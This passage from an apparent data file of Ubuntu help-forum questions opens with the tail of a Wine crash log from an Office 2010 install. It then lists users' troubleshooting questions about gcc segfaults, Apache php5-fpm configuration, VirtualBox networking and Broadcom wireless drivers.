( ) in libc.so.6 ( 0x00000000 ) 25 0xf74fc3de __clone+0x5d ( ) in libc.so.6 ( 0x00000000 ) 26 0xf74fc3de __clone+0x5d ( ) in libc.so.6 ( 0x00000000 ) 27 0xf74fc3de __clone+0x5d ( ) in libc.so.6 ( 0x00000000 ) 28 0xf74fc3de __clone+0x5d ( ) in libc.so.6 ( 0x00000000 ) 29 0xf74fc3de __clone+0x5d ( ) in libc.so.6 ( 0x00000000 ) 30 0xf74fc3de __clone+0x5d ( ) in libc.so.6 ( 0x00000000 ) 31 0xf74fc3de __clone+0x5d ( ) in libc.so.6 ( 0x00000000 ) 32 0xf74fc3de __clone+0x5d ( ) in libc.so.6 ( 0x00000000 ) 33 0xf74fc3de __clone+0x5d ( ) in libc.so.6 ( 0x00000000 ) 34 0xf74fc3de __clone+0x5d ( ) in libc.so.6 ( 0x00000000 ) 35 0xf74fc3de __clone+0x5d ( ) in libc.so.6 ( 0x00000000 ) 36 0xf74fc3de __clone+0x5d ( ) in libc.so.6 ( 0x00000000 ) 37 0xf74fc3de __clone+0x5d ( ) in libc.so.6 ( 0x00000000 ) 38 0xf74fc3de __clone+0x5d ( ) in libc.so.6 ( 0x00000000 ) 39 0xf74fc3de __clone+0x5d ( ) in libc.so.6 ( 0x00000000 ) 40 0xf74fc3de __clone+0x5d ( ) in libc.so.6 ( 0x00000000 ) 41 0xf74fc3de __clone+0x5d ( ) in libc.so.6 ( 0x00000000 ) 42 0xf74fc3de __clone+0x5d ( ) in libc.so.6 ( 0x00000000 ) 43 0xf74fc3de __clone+0x5d ( ) in libc.so.6 ( 0x00000000 ) 44 0xf74fc3de __clone+0x5d ( ) in libc.so.6 ( 0x00000000 ) 45 0xf74fc3de __clone+0x5d ( ) in libc.so.6 ( 0x00000000 ) 46 0xf74fc3de __clone+0x5d ( ) in libc.so.6 ( 0x00000000 ) 47 0xf74fc3de __clone+0x5d ( ) in libc.so.6 ( 0x00000000 ) 48 0xf74fc3de __clone+0x5d ( ) in libc.so.6 ( 0x00000000 ) 49 0xf74fc3de __clone+0x5d ( ) in libc.so.6 ( 0x00000000 ) 50 0xf74fc3de __clone+0x5d ( ) in libc.so.6 ( 0x00000000 ) 51 0xf74fc3de __clone+0x5d ( ) in libc.so.6 ( 0x00000000 ) 52 0xf74fc3de __clone+0x5d ( ) in libc.so.6 ( 0x00000000 ) 53 0xf74fc3de __clone+0x5d ( ) in libc.so.6 ( 0x00000000 ) 54 0xf74fc3de __clone+0x5d ( ) in libc.so.6 ( 0x00000000 ) 55 0xf74fc3de __clone+0x5d ( ) in libc.so.6 ( 0x00000000 ) 56 0xf74fc3de __clone+0x5d ( ) in libc.so.6 ( 0x00000000 ) 57 0xf74fc3de __clone+0x5d ( ) in libc.so.6 ( 0x00000000 ) 58 0xf74fc3de __clone+0x5d ( ) in libc.so.6 ( 0x00000000 ) 59 0xf74fc3de __clone+0x5d ( ) in libc.so.6 ( 0x00000000 ) 60 0xf74fc3de __clone+0x5d ( ) in libc.so.6 ( 0x00000000 ) 61 0xf74fc3de __clone+0x5d ( ) in libc.so.6 ( 0x00000000 ) 62 0xf74fc3de __clone+0x5d ( ) in libc.so.6 ( 0x00000000 ) 63 0xf74fc3de __clone+0x5d ( ) in libc.so.6 ( 0x00000000 ) 64 0xf74fc3de __clone+0x5d ( ) in libc.so.6 ( 0x00000000 ) 65 0xf74fc3de __clone+0x5d ( ) in libc.so.6 ( 0x00000000 ) 66 0xf74fc3de __clone+0x5d ( ) in libc.so.6 ( 0x00000000 ) 67 0xf74fc3de __clone+0x5d ( ) in libc.so.6 ( 0x00000000 ) 68 0xf74fc3de __clone+0x5d ( ) in libc.so.6 ( 0x00000000 ) 69 0xf74fc3de __clone+0x5d ( ) in libc.so.6 ( 0x00000000 ) 70 0xf74fc3de __clone+0x5d ( ) in libc.so.6 ( 0x00000000 ) 71 0xf74fc3de __clone+0x5d ( ) in libc.so.6 ( 0x00000000 ) 72 0xf74fc3de __clone+0x5d ( ) in libc.so.6 ( 0x00000000 ) 73 0xf74fc3de __clone+0x5d ( ) in libc.so.6 ( 0x00000000 ) 74 0xf74fc3de __clone+0x5d ( ) in libc.so.6 ( 0x00000000 ) 75 0xf74fc3de __clone+0x5d ( ) in libc.so.6 ( 0x00000000 ) 76 0xf74fc3de __clone+0x5d ( ) in libc.so.6 ( 0x00000000 ) 77 0xf74fc3de __clone+0x5d ( ) in libc.so.6 ( 0x00000000 ) 78 0xf74fc3de __clone+0x5d ( ) in libc.so.6 ( 0x00000000 ) 79 0xf74fc3de __clone+0x5d ( ) in libc.so.6 ( 0x00000000 ) 80 0xf74fc3de __clone+0x5d ( ) in libc.so.6 ( 0x00000000 ) 81 0xf74fc3de __clone+0x5d ( ) in libc.so.6 ( 0x00000000 ) 82 0xf74fc3de __clone+0x5d ( ) in libc.so.6 ( 0x00000000 ) 83 0xf74fc3de __clone+0x5d ( ) in libc.so.6 ( 0x00000000 ) 84 0xf74fc3de __clone+0x5d ( ) in libc.so.6 ( 0x00000000 ) 85 0xf74fc3de __clone+0x5d ( ) in libc.so.6 ( 0x00000000 ) 86 0xf74fc3de __clone+0x5d ( ) in libc.so.6 ( 0x00000000 ) 87 0xf74fc3de __clone+0x5d ( ) in libc.so.6 ( 0x00000000 ) 88 0xf74fc3de __clone+0x5d ( ) in libc.so.6 ( 0x00000000 ) 89 0xf74fc3de __clone+0x5d ( ) in libc.so.6 ( 0x00000000 ) 90 0xf74fc3de __clone+0x5d ( ) in libc.so.6 ( 0x00000000 ) 91 0xf74fc3de __clone+0x5d ( ) in libc.so.6 ( 0x00000000 ) 92 0xf74fc3de __clone+0x5d ( ) in libc.so.6 ( 0x00000000 ) 93 0xf74fc3de __clone+0x5d ( ) in libc.so.6 ( 0x00000000 ) 94 0xf74fc3de __clone+0x5d ( ) in libc.so.6 ( 0x00000000 ) 95 0xf74fc3de __clone+0x5d ( ) in libc.so.6 ( 0x00000000 ) 96 0xf74fc3de __clone+0x5d ( ) in libc.so.6 ( 0x00000000 ) 97 0xf74fc3de __clone+0x5d ( ) in libc.so.6 ( 0x00000000 ) 98 0xf74fc3de __clone+0x5d ( ) in libc.so.6 ( 0x00000000 ) 99 0xf74fc3de __clone+0x5d ( ) in libc.so.6 ( 0x00000000 ) 100 0xf74fc3de __clone+0x5d ( ) in libc.so.6 ( 0x00000000 ) 101 0xf74fc3de __clone+0x5d ( ) in libc.so.6 ( 0x00000000 ) 102 0xf74fc3de __clone+0x5d ( ) in libc.so.6 ( 0x00000000 ) 103 0xf74fc3de __clone+0x5d ( ) in libc.so.6 ( 0x00000000 ) 104 0xf74fc3de __clone+0x5d ( ) in libc.so.6 ( 0x00000000 ) 105 0xf74fc3de __clone+0x5d ( ) in libc.so.6 ( 0x00000000 ) 106 0xf74fc3de __clone+0x5d ( ) in libc.so.6 ( 0x00000000 ) 107 0xf74fc3de __clone+0x5d ( ) in libc.so.6 ( 0x00000000 ) 108 0xf74fc3de __clone+0x5d ( ) in libc.so.6 ( 0x00000000 ) 109 0xf74fc3de __clone+0x5d ( ) in libc.so.6 ( 0x00000000 ) 110 0xf74fc3de __clone+0x5d ( ) in libc.so.6 ( 0x00000000 ) 111 0xf74fc3de __clone+0x5d ( ) in libc.so.6 ( 0x00000000 ) 112 0xf74fc3de __clone+0x5d ( ) in libc.so.6 ( 0x00000000 ) 113 0xf74fc3de __clone+0x5d ( ) in libc.so.6 ( 0x00000000 ) 114 0xf74fc3de __clone+0x5d ( ) in libc.so.6 ( 0x00000000 ) 115 0xf74fc3de __clone+0x5d ( ) in libc.so.6 ( 0x00000000 ) 116 0xf74fc3de __clone+0x5d ( ) in libc.so.6 ( 0x00000000 ) 117 0xf74fc3de __clone+0x5d ( ) in libc.so.6 ( 0x00000000 ) 118 0xf74fc3de __clone+0x5d ( ) in libc.so.6 ( 0x00000000 ) 119 0xf74fc3de __clone+0x5d ( ) in libc.so.6 ( 0x00000000 ) 120 0xf74fc3de __clone+0x5d ( ) in libc.so.6 ( 0x00000000 ) 121 0xf74fc3de __clone+0x5d ( ) in libc.so.6 ( 0x00000000 ) 122 0xf74fc3de __clone+0x5d ( ) in libc.so.6 ( 0x00000000 ) 123 0xf74fc3de __clone+0x5d ( ) in libc.so.6 ( 0x00000000 ) 124 0xf74fc3de __clone+0x5d ( ) in libc.so.6 ( 0x00000000 ) 125 0xf74fc3de __clone+0x5d ( ) in libc.so.6 ( 0x00000000 ) 126 0xf74fc3de __clone+0x5d ( ) in libc.so.6 ( 0x00000000 ) 127 0xf74fc3de __clone+0x5d ( ) in libc.so.6 ( 0x00000000 ) 128 0xf74fc3de __clone+0x5d ( ) in libc.so.6 ( 0x00000000 ) 129 0xf74fc3de __clone+0x5d ( ) in libc.so.6 ( 0x00000000 ) 130 0xf74fc3de __clone+0x5d ( ) in libc.so.6 ( 0x00000000 ) 131 0xf74fc3de __clone+0x5d ( ) in libc.so.6 ( 0x00000000 ) 132 0xf74fc3de __clone+0x5d ( ) in libc.so.6 ( 0x00000000 ) 133 0xf74fc3de __clone+0x5d ( ) in libc.so.6 ( 0x00000000 ) 134 0xf74fc3de __clone+0x5d ( ) in libc.so.6 ( 0x00000000 ) 135 0xf74fc3de __clone+0x5d ( ) in libc.so.6 ( 0x00000000 ) 136 0xf74fc3de __clone+0x5d ( ) in libc.so.6 ( 0x00000000 ) 137 0xf74fc3de __clone+0x5d ( ) in libc.so.6 ( 0x00000000 ) 138 0xf74fc3de __clone+0x5d ( ) in libc.so.6 ( 0x00000000 ) 139 0xf74fc3de __clone+0x5d ( ) in libc.so.6 ( 0x00000000 ) 140 0xf74fc3de __clone+0x5d ( ) in libc.so.6 ( 0x00000000 ) 141 0xf74fc3de __clone+0x5d ( ) in libc.so.6 ( 0x00000000 ) 142 0xf74fc3de __clone+0x5d ( ) in libc.so.6 ( 0x00000000 ) 143 0xf74fc3de __clone+0x5d ( ) in libc.so.6 ( 0x00000000 ) 144 0xf74fc3de __clone+0x5d ( ) in libc.so.6 ( 0x00000000 ) 145 0xf74fc3de __clone+0x5d ( ) in libc.so.6 ( 0x00000000 ) 146 0xf74fc3de __clone+0x5d ( ) in libc.so.6 ( 0x00000000 ) 147 0xf74fc3de __clone+0x5d ( ) in libc.so.6 ( 0x00000000 ) 148 0xf74fc3de __clone+0x5d ( ) in libc.so.6 ( 0x00000000 ) 149 0xf74fc3de __clone+0x5d ( ) in libc.so.6 ( 0x00000000 ) 150 0xf74fc3de __clone+0x5d ( ) in libc.so.6 ( 0x00000000 ) 151 0xf74fc3de __clone+0x5d ( ) in libc.so.6 ( 0x00000000 ) 152 0xf74fc3de __clone+0x5d ( ) in libc.so.6 ( 0x00000000 ) 153 0xf74fc3de __clone+0x5d ( ) in libc.so.6 ( 0x00000000 ) 154 0xf74fc3de __clone+0x5d ( ) in libc.so.6 ( 0x00000000 ) 155 0xf74fc3de __clone+0x5d ( ) in libc.so.6 ( 0x00000000 ) 156 0xf74fc3de __clone+0x5d ( ) in libc.so.6 ( 0x00000000 ) 157 0xf74fc3de __clone+0x5d ( ) in libc.so.6 ( 0x00000000 ) 158 0xf74fc3de __clone+0x5d ( ) in libc.so.6 ( 0x00000000 ) 159 0xf74fc3de __clone+0x5d ( ) in libc.so.6 ( 0x00000000 ) 160 0xf74fc3de __clone+0x5d ( ) in libc.so.6 ( 0x00000000 ) 161 0xf74fc3de __clone+0x5d ( ) in libc.so.6 ( 0x00000000 ) 162 0xf74fc3de __clone+0x5d ( ) in libc.so.6 ( 0x00000000 ) 163 0xf74fc3de __clone+0x5d ( ) in libc.so.6 ( 0x00000000 ) 164 0xf74fc3de __clone+0x5d ( ) in libc.so.6 ( 0x00000000 ) 165 0xf74fc3de __clone+0x5d ( ) in libc.so.6 ( 0x00000000 ) 166 0xf74fc3de __clone+0x5d ( ) in libc.so.6 ( 0x00000000 ) 167 0xf74fc3de __clone+0x5d ( ) in libc.so.6 ( 0x00000000 ) 168 0xf74fc3de __clone+0x5d ( ) in libc.so.6 ( 0x00000000 ) 169 0xf74fc3de __clone+0x5d ( ) in libc.so.6 ( 0x00000000 ) 170 0xf74fc3de __clone+0x5d ( ) in libc.so.6 ( 0x00000000 ) 171 0xf74fc3de __clone+0x5d ( ) in libc.so.6 ( 0x00000000 ) 172 0xf74fc3de __clone+0x5d ( ) in libc.so.6 ( 0x00000000 ) 173 0xf74fc3de __clone+0x5d ( ) in libc.so.6 ( 0x00000000 ) 174 0xf74fc3de __clone+0x5d ( ) in libc.so.6 ( 0x00000000 ) 175 0xf74fc3de __clone+0x5d ( ) in libc.so.6 ( 0x00000000 ) 176 0xf74fc3de __clone+0x5d ( ) in libc.so.6 ( 0x00000000 ) 177 0xf74fc3de __clone+0x5d ( ) in libc.so.6 ( 0x00000000 ) 178 0xf74fc3de __clone+0x5d ( ) in libc.so.6 ( 0x00000000 ) 179 0xf74fc3de __clone+0x5d ( ) in libc.so.6 ( 0x00000000 ) 180 0xf74fc3de __clone+0x5d ( ) in libc.so.6 ( 0x00000000 ) 181 0xf74fc3de __clone+0x5d ( ) in libc.so.6 ( 0x00000000 ) 182 0xf74fc3de __clone+0x5d ( ) in libc.so.6 ( 0x00000000 ) 183 0xf74fc3de __clone+0x5d ( ) in libc.so.6 ( 0x00000000 ) 184 0xf74fc3de __clone+0x5d ( ) in libc.so.6 ( 0x00000000 ) 185 0xf74fc3de __clone+0x5d ( ) in libc.so.6 ( 0x00000000 ) 186 0xf74fc3de __clone+0x5d ( ) in libc.so.6 ( 0x00000000 ) 187 0xf74fc3de __clone+0x5d ( ) in libc.so.6 ( 0x00000000 ) 188 0xf74fc3de __clone+0x5d ( ) in libc.so.6 ( 0x00000000 ) 189 0xf74fc3de __clone+0x5d ( ) in libc.so.6 ( 0x00000000 ) 190 0xf74fc3de __clone+0x5d ( ) in libc.so.6 ( 0x00000000 ) 191 0xf74fc3de __clone+0x5d ( ) in libc.so.6 ( 0x00000000 ) 192 0xf74fc3de __clone+0x5d ( ) in libc.so.6 ( 0x00000000 ) 193 0xf74fc3de __clone+0x5d ( ) in libc.so.6 ( 0x00000000 ) 194 0xf74fc3de __clone+0x5d ( ) in libc.so.6 ( 0x00000000 ) 195 0xf74fc3de __clone+0x5d ( ) in libc.so.6 ( 0x00000000 ) 196 0xf74fc3de __clone+0x5d ( ) in libc.so.6 ( 0x00000000 ) 197 0xf74fc3de __clone+0x5d ( ) in libc.so.6 ( 0x00000000 ) 198 0xf74fc3de __clone+0x5d ( ) in libc.so.6 ( 0x00000000 ) 199 0xf74fc3de __clone+0x5d ( ) in libc.so.6 ( 0x00000000 ) 200 0xf74fc3de __clone+0x5d ( ) in libc.so.6 ( 0x00000000 ) 0x7b83ae0b : subl $ 4 , % esp modules : module address debug info name ( 149 modules ) pe 840000- 86f000 deferred osetupui pe ba0000- ba7000 deferred msi7c0d.tmp pe d40000- d51000 deferred msi7bb6.tmp pe d80000- ddd000 export msi7bec.tmp pe de0000- df8000 deferred msi83ed.tmp pe e00000- e0a000 deferred msi83f8.tmp pe f40000- 1072000 deferred pidgenx pe 1440000- 145a000 deferred msi958a.tmp pe 9e80000- 9edb000 deferred msi889c.tmp pe 9ee0000- 9f0a000 deferred msi9130.tmp pe 10000000-10593000 deferred osetup pe 2e000000-2e119000 deferred setup pe 41110000-41155000 deferred msi7bd6.tmp pe 504a0000-504c7000 deferred msi9112.tmp pe 504d0000-504f0000 deferred msi8b04.tmp elf 7b800000-7ba44000 dwarf kernel32 < elf > \-pe 7b810000-7ba44000 \ kernel32 elf 7bab6000-7bb00000 deferred libdbus-1.so.3 elf 7bc00000-7bce4000 dwarf ntdll < elf > \-pe 7bc10000-7bce4000 \ ntdll elf 7be0f000-7be32000 deferred localspl < elf > \-pe 7be10000-7be32000 \ localspl elf 7be32000-7bf00000 deferred libkrb5.so.3 elf 7bf00000-7bf04000 deferred < wine-loader > elf 7bf09000-7bf25000 deferred spoolss < elf > \-pe 7bf10000-7bf25000 \ spoolss elf 7bf25000-7bf3c000 deferred libresolv.so.2 elf 7bf3c000-7bf64000 deferred libk5crypto.so.3 elf 7bf64000-7bfa1000 deferred libgssapi_krb5.so.2 elf 7bfa1000-7c000000 deferred libcups.so.2 elf 7c208000-7c2aa000 deferred msvcrt < elf > \-pe 7c220000-7c2aa000 \ msvcrt elf 7c2aa000-7c400000 deferred libxml2.so.2 elf 7c40c000-7c415000 deferred librt.so.1 elf 7c415000-7c427000 deferred libavahi-client.so.3 elf 7c427000-7c468000 deferred winspool < elf > \-pe 7c430000-7c468000 \ winspool elf 7c468000-7c485000 deferred libgcc_s.so.1 elf 7c485000-7c4c2000 deferred libxslt.so.1 elf 7c4c2000-7c4e9000 deferred liblzma.so.5 elf 7c4e9000-7c59e000 deferred msxml3 < elf > \-pe 7c4f0000-7c59e000 \ msxml3 elf 7c59e000-7c5cd000 deferred msxml6 < elf > \-pe 7c5a0000-7c5cd000 \ msxml6 elf 7d0e1000-7d0ea000 deferred libkrb5support.so.0 elf 7d0ea000-7d0f8000 deferred libavahi-common.so.3 elf 7d5b5000-7d5b9000 deferred libkeyutils.so.1 elf 7d5b9000-7d5be000 deferred libcom_err.so.2 elf 7d5d6000-7d63e000 deferred riched20 < elf > \-pe 7d5e0000-7d63e000 \ riched20 elf 7d63e000-7d672000 deferred hhctrl < elf > \-pe 7d640000-7d672000 \ hhctrl elf 7d672000-7d696000 deferred hlink < elf > \-pe 7d680000-7d696000 \ hlink elf 7d696000-7d6b6000 deferred oleacc < elf > \-pe 7d6a0000-7d6b6000 \ oleacc elf 7d6b6000-7d6fa000 deferred rsaenh < elf > \-pe 7d6c0000-7d6fa000 \ rsaenh elf 7d6fa000-7d715000 deferred imagehlp < elf > \-pe 7d700000-7d715000 \ imagehlp elf 7d72d000-7d764000 deferred uxtheme < elf > \-pe 7d730000-7d764000 \ uxtheme elf 7d764000-7d76b000 deferred libxfixes.so.3 elf 7d76b000-7d776000 deferred libxcursor.so.1 elf 7d7f6000-7d81e000 deferred libexpat.so.1 elf 7d81e000-7d857000 deferred libfontconfig.so.1 elf 7d857000-7d867000 deferred libxi.so.6 elf 7d867000-7d872000 deferred libxrandr.so.2 elf 7d872000-7d87c000 deferred libxrender.so.1 elf 7d87c000-7d882000 deferred libxxf86vm.so.1 elf 7d882000-7d8a6000 deferred imm32 < elf > \-pe 7d890000-7d8a6000 \ imm32 elf 7d8a6000-7d8ad000 deferred libxdmcp.so.6 elf 7d8ad000-7d8cf000 deferred libxcb.so.1 elf 7d8cf000-7d8d5000 deferred libuuid.so.1 elf 7d8d5000-7d8ef000 deferred libice.so.6 elf 7d8ef000-7da26000 deferred libx11.so.6 elf 7da26000-7da38000 deferred libxext.so.6 elf 7da38000-7da41000 deferred libsm.so.6 elf 7da41000-7daf2000 deferred winex11 < elf > \-pe 7da50000-7daf2000 \ winex11 elf 7daf2000-7db8d000 deferred libfreetype.so.6 elf 7dba5000-7dbb9000 deferred libp11-kit.so.0 elf 7dbb9000-7dbcb000 deferred libtasn1.so.3 elf 7dbcb000-7dc4f000 deferred libgcrypt.so.11 elf 7dc4f000-7dd14000 deferred libgnutls.so.26 elf 7dd14000-7dd38000 deferred cabinet < elf > \-pe 7dd20000-7dd38000 \ cabinet elf 7dd38000-7dd61000 deferred mpr < elf > \-pe 7dd40000-7dd61000 \ mpr elf 7dd61000-7dd7a000 deferred libz.so.1 elf 7dd7b000-7dd7f000 deferred libxcomposite.so.1 elf 7dd7f000-7dd92000 deferred gnome-keyring-pkcs11.so elf 7dd92000-7de0c000 deferred wininet < elf > \-pe 7dda0000-7de0c000 \ wininet elf 7de0c000-7deb9000 deferred urlmon < elf > \-pe 7de20000-7deb9000 \ urlmon elf 7deb9000-7dfdb000 dwarf msi < elf > \-pe 7dec0000-7dfdb000 \ msi elf 7dfdb000-7e04b000 deferred dbghelp < elf > \-pe 7dfe0000-7e04b000 \ dbghelp elf 7e04b000-7e121000 deferred crypt32 < elf > \-pe 7e050000-7e121000 \ crypt32 elf 7e121000-7e15b000 deferred wintrust < elf > \-pe 7e130000-7e15b000 \ wintrust elf 7e15b000-7e27a000 deferred comctl32 < elf > \-pe 7e160000-7e27a000 \ comctl32 elf 7e27a000-7e2f0000 deferred shlwapi < elf > \-pe 7e290000-7e2f0000 \ shlwapi elf 7e2f0000-7e52e000 deferred shell32 < elf > \-pe 7e300000-7e52e000 \ shell32 elf 7e52e000-7e673000 deferred oleaut32 < elf > \-pe 7e540000-7e673000 \ oleaut32 elf 7e673000-7e754000 deferred gdi32 < elf > \-pe 7e680000-7e754000 \ gdi32 elf 7e754000-7e8c4000 deferred user32 < elf > \-pe 7e770000-7e8c4000 \ user32 elf 7e8c4000-7ea26000 deferred ole32 < elf > \-pe 7e8e0000-7ea26000 \ ole32 elf 7ea26000-7eab0000 deferred rpcrt4 < elf > \-pe 7ea30000-7eab0000 \ rpcrt4 elf 7eab0000-7eae4000 deferred ws2_32 < elf > \-pe 7eac0000-7eae4000 \ ws2_32 elf 7eae4000-7eb56000 deferred advapi32 < elf > \-pe 7eaf0000-7eb56000 \ advapi32 elf 7eb56000-7eb7b000 deferred iphlpapi < elf > \-pe 7eb60000-7eb7b000 \ iphlpapi elf 7eb7b000-7ebaa000 deferred netapi32 < elf > \-pe 7eb80000-7ebaa000 \ netapi32 elf 7ebaa000-7ebdf000 deferred secur32 < elf > \-pe 7ebb0000-7ebdf000 \ secur32 elf 7ebdf000-7ebfa000 deferred version < elf > \-pe 7ebe0000-7ebfa000 \ version elf 7ebfa000-7ec07000 deferred libnss_files.so.2 elf 7ec07000-7ec13000 deferred libnss_nis.so.2 elf 7ec13000-7ec2c000 deferred libnsl.so.1 elf 7ec2c000-7ec35000 deferred libnss_compat.so.2 elf 7efa5000-7efe8000 deferred libm.so.6 elf 7efe8000-7efec000 deferred libxinerama.so.1 elf 7efec000-7f000000 deferred psapi < elf > \-pe 7eff0000-7f000000 \ psapi elf f7401000-f7405000 deferred libxau.so.6 elf f7406000-f740b000 deferred libdl.so.2 elf f740b000-f75be000 dwarf libc.so.6 elf f75bf000-f75da000 dwarf libpthread.so.0 elf f75da000-f75df000 deferred libgpg-error.so.0 elf f75f2000-f7736000 dwarf libwine.so.1 elf f7738000-f775a000 deferred ld-linux.so.2 elf f775a000-f775b000 deferred [ vdso ] .so threads : process tid prio ( all id : s are in hex ) 0000000e services.exe 0000005b 0 0000005c 0 00000059 0 0000002e 0 0000001f 0 00000015 0 00000010 0 0000000f 0 00000012 winedevice.exe 0000001d 0 0000001a 0 00000014 0 00000013 0 0000001b plugplay.exe 00000021 0 0000001e 0 0000001c 0 00000022 explorer.exe 00000023 0 0000002a ( d ) c : \users\birendra\desktop\office 2010\setup.exe 0000005d 0 < == 0000002f 0 0000002b 0 00000042 ose.exe 00000045 0 00000047 0 0000002d 0 00000036 0 00000040 0 00000017 0 00000018 0 00000034 0 system information : wine build : wine-1.4.1 platform : i386 ( wow64 ) host system : linux host version : 3.8.0-19-generic anybody give me suggestion how to fix the problem to install it .
312822	'core dumped ' while opening sublime text 2	i am getting '4xxx bus error core ( dumped ) ' while trying to open sublime text by using this command /usr/lib/sublime-text-2/sublime_text -- class=sublime-text-2 `` $ @ '' . it was worked perfectly until yesterday . any remedy for this . do i need to re install my sublime ?
312825	modifying openstack-dashboard package 's source code in ubuntu when installed using apt-get	i have installed horizon openstack-dashboard using `` apt-get install openstack-dashboard '' . i want to apply a patch to that code . i tried to search for the directory where this package 's source-code is added . i could find that its present in /usr/share/openstack-dashboard directory . i changed a single line in openstack_dashboard/api/keystone.py file and then restarted the apache2 service . now my dashboard is not coming up and its giving dependency errors . i removed that change , restored it to previous verion and still its giving error . i want to know that why its failing which used to work previously . i have n't done even a single line of change . earlier it was able to resolve the other packages , but now its not . what could be the reason for this strange behaviour ?
312827	virtual box ubuntu : internet not detected on guest ( ubuntu ) in host ( winxp )	iam unable to get internet connection inside guest ( ubuntu ) in virtual box although host ( winxp ) has an internet connection . tried with nat : in ubuntu it shows wired connection connected but unable to browse sites . tried with bridged adapter : in ubuntu it shows that wired connection is not connected . yes i use a proxy i just appended the lines in the file . `` in the window that opens add the following lines modifying as appropriate to the file '' can you explain what appropriate is . i am still not able to get connected to internet .
312833	is there way to check if users use ubuntu desktop amd64 or amd64+mac ?	i believe uname -a on installation from both regular 64-bit and mac iso outputs the same info string . is there way to tell apart their architectures ?
312835	gcc segmentation fault on ubuntu 12.04	i am trying to compile a c program on ubuntu precise 12.04 . here 's the program : # include < stdio.h > int main ( int argc , char** argv ) { printf ( `` hello world ! `` ) ; return 0 ; } my gcc version is 4.6.3 ( ubuntu/linaro 4.6.3-1ubuntu5 ) . initially it did not find cc1 so i added a soft link . now i get this message when i try to compile : gcc : internal compiler error : segmentation fault ( program cc1 ) compiling the same program with g++ works fine . i tried reinstalling build-essential , but to no avail . what am i missing ? edit : i tried reinstalling according to @ gertyvdijk 's suggestion . as it did not help , here is the output of apt-cache policy gcc-4.6 : gcc-4.6 : installed : 4.6.3-1ubuntu5 candidate : 4.6.3-1ubuntu5 version table : *** 4.6.3-1ubuntu5 0 500 http : //il.archive.ubuntu.com/ubuntu/ precise/main amd64 packages 100 /var/lib/dpkg/status and the output of ls -l /usr/bin/gcc : lrwxrwxrwx 1 root root 7 mar 13 2012 /usr/bin/gcc - > gcc-4.6 edit # 2 : here 's a verbose compiler output : gcc -v aaa.c using built-in specs . collect_gcc=gcc collect_lto_wrapper=/usr/lib/gcc/x86_64-linux-gnu/4.6/lto-wrapper target : x86_64-linux-gnu configured with : ../src/configure -v -- with-pkgversion='ubuntu/linaro 4.6.3-1ubuntu5 ' -- with-bugurl=file : ///usr/share/doc/gcc-4.6/readme.bugs -- enable-languages=c , c++ , fortran , objc , obj-c++ -- prefix=/usr -- program-suffix=-4.6 -- enable-shared -- enable-linker-build-id -- with-system-zlib -- libexecdir=/usr/lib -- without-included-gettext -- enable-threads=posix -- with-gxx-include-dir=/usr/include/c++/4.6 -- libdir=/usr/lib -- enable-nls -- with-sysroot=/ -- enable-clocale=gnu -- enable-libstdcxx-debug -- enable-libstdcxx-time=yes -- enable-gnu-unique-object -- enable-plugin -- enable-objc-gc -- disable-werror -- with-arch-32=i686 -- with-tune=generic -- enable-checking=release -- build=x86_64-linux-gnu -- host=x86_64-linux-gnu -- target=x86_64-linux-gnu thread model : posix gcc version 4.6.3 ( ubuntu/linaro 4.6.3-1ubuntu5 ) collect_gcc_options='-v ' '-mtune=generic ' '-march=x86-64' /usr/lib/gcc/x86_64-linux-gnu/4.6/cc1 -quiet -v -imultilib . -imultiarch x86_64-linux-gnu aaa.c -quiet -dumpbase aaa.c -mtune=generic -march=x86-64 -auxbase aaa -version -fstack-protector -o /tmp/cchfcxms.s gcc : internal compiler error : segmentation fault ( program cc1 ) please submit a full bug report , with preprocessed source if appropriate . see < file : ///usr/share/doc/gcc-4.6/readme.bugs > for instructions .
312837	how can i install php5-fpm and apache and configure the apache vhost ?	i do n't find a valid a description how can i install configure the apache vhost correctly . can everybody help me ? < virtualhost *:80 > serveradmin webmaster @ localhost servername webpage.com serveralias www.webpage.com documentroot /home/userdir/webpage.com alias /php5-fcgi /usr/lib/cgi-bin # alias /php-fpm /home/userdir/webpage.com/php-fpm fastcgiexternalserver /home/userdir/webpage.com/php5-fcgi -flush -pass-header http_authorization -host 127.0.0.1:11000 # addtype application/x-httpd-fastphp5 .php # action appication/x-httpd-fastphp5 /php-fpm action php5-fcgi /php5-fcgi addhandler php5-fcgi .php scriptalias php5-fcgi /home/userdir/webpage.com/ # directoryindex index.php index.html < directory / > options followsymlinks +execcgi +symlinksifownermatch # directoryindex index.php allowoverride none < /directory > < directory /home/userdir/webpage.com/ > options indexes followsymlinks multiviews allowoverride none # directoryindex index.php order allow , deny allow from all < /directory > # scriptalias /cgi-bin/ /usr/lib/cgi-bin/ < directory `` /usr/lib/cgi-bin '' > allowoverride none options +execcgi -multiviews +symlinksifownermatch order allow , deny allow from all < /directory > errorlog $ { apache_log_dir } /error.log # possible values include : debug , info , notice , warn , error , crit , # alert , emerg . loglevel warn customlog $ { apache_log_dir } /access.log combined < /virtualhost > and the output in the browser : not found the requested url /php5-fcgi/index.php was not found on this server . and the apache error log : file does not exist : /usr/lib/cgi-bin/index.php
312840	rhythmbox 2.98 crashes all the time	the default version of rhythmbox is 2.98 and it always crashes after a long period of pause of playing . how can i upgrade this version to a newer one ?
312841	nvidia card for a laptop ca n't be detected	my vgn-sz32cp laptop uses a nvidia geforce go 7400 gpu , but it seems that ubuntu does not detect it , like this : dragon @ dragon-vgn-sz32cp-b : ~ $ lspci |grep vga 00:02.0 vga compatible controller : intel corporation mobile 945gm/gms , 943/940gml express integrated graphics controller ( rev 03 ) but only the cheap intel card.is there anybody who has the solution for it ?
312844	can not get wireless working by any means on 12.04 ( broadcom issues )	i am a linux newbie interested in getting to know my computer a little bit better . the last time i even tried linux was ubuntu 8.04lts ( hardy heron ) . i am not scared of the terminal but i am not necessarily great at reading it / knowing commands . i 've been having some major issues getting wireless to work on my hardware ( asus g75vw ) , despite trying many of the workarounds on the site . i 've already tried the following methods , all of which lead to replicatable responses . using additional drivers ( jockey ) to attempt to install `` broadcom sta driver '' which results in a hang on `` installing drivers '' , which also prevents me from closing jockey at all . this does not happen when installing nvidia drivers , so it must be the broadcom sta drivers causing this . removing bcmwl-kernel-source and then installing b43-fwcutter and firmware-b43-installer and then commenting `` blacklist bcm43xx '' installing bcmwl-kernel-source in synaptic/terminal which results in a terminal hang on modprobe attempting a sudo apt-get install -- reinstall bcmwl-kernel-source which results in a terminal hang at dkms : completed ( which requires me to sudo dpkg -r bcmwl-kernel-source at next terminal launch to get back synaptic and apt-get access ) attempting to sudo apt-get install 